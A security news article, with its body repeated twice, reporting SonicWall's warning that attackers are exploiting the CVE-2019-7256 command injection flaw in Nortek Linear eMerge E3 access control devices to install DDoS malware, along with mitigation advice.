SonicWall experts warned of a wave of attacks on smart access control systems in buildings, which cybercriminals then use to organize DDoS attacks.
The researchers explain that the attacks target Linear eMerge E3 devices manufactured by Nortek Security & Control. These are the so-called "access control hardware" that are installed in offices, factories, and so on. Their main purpose is to control which doors and rooms employees and visitors can access based on their credentials (access codes) and smart cards.
Back in May last year, experts from Applied Risk disclosed details of ten vulnerabilities affecting Linear eMerge E3 devices. Although six out of ten issues received a 9.8 out of 10 maximum points on the CVSS3 scale, the developers have not released a fix for these bugs. As a result, after waiting enough time, in November 2019, Applied Risk experts published PoC exploits in the public domain.
SonicWall researchers now warn that hackers are looking for vulnerable Linear eMerge E3 devices and exploiting one of ten previously found vulnerabilities against them: CVE-2019-7256. This issue has been described as a command injection bug and was one of two vulnerabilities scored 10 out of 10 on the CVSS3 scale. This means that the bug can be exploited remotely, even by low-skilled attackers who do not have deep technical knowledge.
SonicWall explains that an unauthenticated remote attacker could exploit the problem to execute arbitrary commands in the context of an application through a specially crafted HTTP request. Currently, hackers use the bug to take control of devices, download and install malware, and subsequent DDoS attacks. According to SonicWall, there are about 2,375 vulnerable devices available on the network, based on Shodan statistics.
The first attacks were recorded on January 9, 2020, and were spotted by Bad Packets and have continued since then.
The researchers also warn that in addition to DDoS attacks, vulnerable devices can be used as entry points into the internal networks of organizations. System administrators are strongly advised to disconnect vulnerable devices from the Internet or restrict access to them using a firewall and VPN.
The researchers explain that the attacks target Linear eMerge E3 devices manufactured by Nortek Security & Control. These are the so-called "access control hardware" that are installed in offices, factories, and so on. Their main purpose is to control which doors and rooms employees and visitors can access based on their credentials (access codes) and smart cards.
Back in May last year, experts from Applied Risk disclosed details of ten vulnerabilities affecting Linear eMerge E3 devices. Although six out of ten issues received a 9.8 out of 10 maximum points on the CVSS3 scale, the developers have not released a fix for these bugs. As a result, after waiting enough time, in November 2019, Applied Risk experts published PoC exploits in the public domain.
SonicWall researchers now warn that hackers are looking for vulnerable Linear eMerge E3 devices and exploiting one of ten previously found vulnerabilities against them: CVE-2019-7256. This issue has been described as a command injection bug and was one of two vulnerabilities scored 10 out of 10 on the CVSS3 scale. This means that the bug can be exploited remotely, even by low-skilled attackers who do not have deep technical knowledge.
SonicWall explains that an unauthenticated remote attacker could exploit the problem to execute arbitrary commands in the context of an application through a specially crafted HTTP request. Currently, hackers use the bug to take control of devices, download and install malware, and subsequent DDoS attacks. According to SonicWall, there are about 2,375 vulnerable devices available on the network, based on Shodan statistics.
The first attacks were recorded on January 9, 2020, and were spotted by Bad Packets and have continued since then.
The researchers also warn that in addition to DDoS attacks, vulnerable devices can be used as entry points into the internal networks of organizations. System administrators are strongly advised to disconnect vulnerable devices from the Internet or restrict access to them using a firewall and VPN.
